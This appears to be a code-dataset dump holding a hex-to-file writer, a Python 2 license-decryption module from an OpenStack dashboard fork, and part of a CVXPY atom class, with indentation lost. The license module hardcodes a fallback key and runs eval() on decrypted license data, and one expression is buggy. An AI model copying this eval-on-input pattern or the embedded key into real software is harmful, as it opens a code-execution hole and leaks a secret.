618a620a630a638a640a648a650a658a660a668a670a678a680a688a690a698a6a0a6a8a6b0a6b8a6c0a6c8a6d0a6d8a6e0a6e8a6f0a6f8a600a708a710a718a720a728a730a738a740a748a750a758a760a768a770a778a780a788a790a7d8a7f8a718a838a858a890a8a8a8b0a8b8a8c0a830ae40ae50ae009001003400000010a218a220a228a230a238a240a248a250a258a268a270a278a280a288a290a298a2a0a2b0a2b8a2c0a2c8a200d0010014000000e0a908aa30aa58aa78aa000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
with open(input("Save as: "), "wb") as f:
f.write(bytearray.fromhex(raw_code))
|
mit
|
xuweiliang/Codelibrary
|
openstack_dashboard/api/authcode_back.py
|
1
|
2953
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import time
import base64
import hashlib
class AuthCode(object):
@classmethod
def code_init(cls, cipher):
try:
encrypted_data = getattr(cipher, 'encrypted_license')
encrypted_str = encrypted_data.strip()
decryption = None
if hasattr(cipher, 'system_uuid'):
key, pwd= cipher.system_uuid.split(":")
if getattr(cipher, 'disabled'):
decryption=cls.decode(encrypted_str, 'fr1e54b8t4n4m47')
else:
decryption=cls.decode(encrypted_str, key)
return eval(decryption)
except Exception:
return None
@classmethod
def decode(cls, string, key, expiry=0):
try:
return cls._auth_code(string, 'DECODE', key, expiry)
except:
return
@staticmethod
def _md5(source_string):
return hashlib.md5(source_string).hexdigest()
@classmethod
def _auth_code(cls, input_string, operation='DECODE', key='', expiry=3600):
rand_key_length = 4
key = cls._md5(key)
key_a = cls._md5(key[:16])
key_b = cls._md5(key[16:])
if rand_key_length:
if operation == 'DECODE':
key_c = input_string[:rand_key_length]
else:
key_c = cls._md5(str(time.time()))[-rand_key_length:]
else:
key_c = ''
crypt_key = key_a + cls._md5(key_a + key_c)
if operation == 'DECODE':
handled_string = base64.b64decode(input_string[rand_key_length:])
else:
expiration_time = expiry + int(time.time) if expiry else 0
handled_string = '%010d' % expiration_time + cls._md5(input_string + key_b)[:16] + input_string
rand_key = list()
for i in xrange(256):
rand_key.append(ord(crypt_key[i % len(crypt_key)]))
# ----------------------------------------------------------
box = range(256)
j = 0
for i in xrange(256):
j = (j + box[i] + rand_key[i]) % 256
tmp = box[i]
box[i] = box[j]
box[j] = tmp
result = ''
a = 0
j = 0
for i in xrange(len(handled_string)):
a = (a + 1) % 256
j = (j + box[a]) % 256
tmp = box[a]
box[a] = box[j]
box[j] = tmp
result += chr(ord(handled_string[i])^(box[(box[a]+box[j])%256]))
if operation == 'DECODE':
if (int(result[:10]) == 0 or (int(result[:10]) - time.time() > 0)) and \
(result[10:26] == cls._md5(result[26:] + key_b)[:16]):
output_string = result[26:]
else:
output_string = ''
else:
output_string = key_c + base64.b64encode(result)
return output_string
|
apache-2.0
|
ashhher3/cvxpy
|
cvxpy/atoms/elementwise/elementwise.py
|
10
|
1354
|
"""
Copyright 2013 Steven Diamond
This file is part of CVXPY.
CVXPY is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CVXPY is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CVXPY. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
import abc
from cvxpy.atoms.atom import Atom
import operator as op
if sys.version_info >= (3, 0):
from functools import reduce
class Elementwise(Atom):
""" Abstract base class for elementwise atoms. """
__metaclass__ = abc.ABCMeta
def shape_from_args(self):
"""Shape is the same as the sum of the arguments.
"""
return reduce(op.add, [arg._dcp_attr.shape for arg in self.args])
def validate_arguments(self):
"""
Verify that all the shapes are the same
or can be promoted.
"""
shape = self.args[0]._dcp_attr.shape
for arg in self.args[1:]:
shape = shape + arg._dcp_attr.shape
|
gpl-3.0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.